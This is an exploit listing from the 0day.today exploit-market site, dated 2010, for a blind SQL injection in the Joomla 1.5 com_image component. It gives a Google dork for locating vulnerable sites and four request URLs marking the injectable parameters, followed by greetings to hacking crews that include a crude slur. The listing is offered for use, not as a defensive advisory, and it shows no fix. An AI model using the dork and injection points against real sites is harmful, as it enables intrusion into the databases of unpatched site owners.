[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Joomla Components com_image SQL Injection Vulnerability

Author
mc2_s3lector
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-12708
Category
web applications
Date add
14-06-2010
Platform
php
=======================================================
Joomla Components com_image SQL Injection Vulnerability
=======================================================


1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=1
0     _                   __           __       __                     0
1   /' \            __  /'__`\        /\ \__  /'__`\                   1
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           0
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          1
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           0
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           1
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           0
1                  \ \____/ >> Exploit database separated by exploit   1
0                   \/___/                                             0
0                                                                      1
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-0

[+] Title	: joomla image_com Blind Sql Injection
[+] Author	: mc2_s3lector
[+] site	: www.yogyacarderlink.web.id
[+] Aplication	: Joomla 1.5 some version/PHP 
[+] Dork        : inurl:"com_image"

code:

dnsname/patch/index.php?option=com_image&view=[sqli]
dnsname/patch/index.php?option=com_image&Itemid=87&gallery=[sqli]
dnsname/patch/index.php?option=com_image&view=image&Itemid=[sqli]
dnsname/patch/index.php?option=com_image&page=[sqli]
------------------------------------------------------------------------------------------------------------------
thank to family yogyacarderlink		 : v3nom,z0mb1e,m4rc0,mywisd0m,setanmuda,leqhi,lingga,JaLi,g3l4p_gul1t@,
					   d3wancc,craxboy90,bye-bye,bejo6,joglo,yuy03zt & all GAY :P

thank to makassar security research      : c0decstuff,flowerjingga,kernelpreter,dewiyunand4:P,x0|2

thank to family KeDaiComputerworks	 : Wahdan(elpac1ano)on3-d4y,KeDai v5,muhammad abudhar,h3ndry_sl4nk,and3rson
					   opeey,ravenvill,4m-007
thank to family Makassar open code/google:  
hide frofile you all     
					 : yuy03zt,qtung'ID,jack throya,william,pertiwil,ridobattala,kernel maniac
                                           h3xa maniac,Poisoning(you are expert & low profile) 
--------------------------------------------------------------------------------------------------------------------




#  0day.today [2024-12-26]  #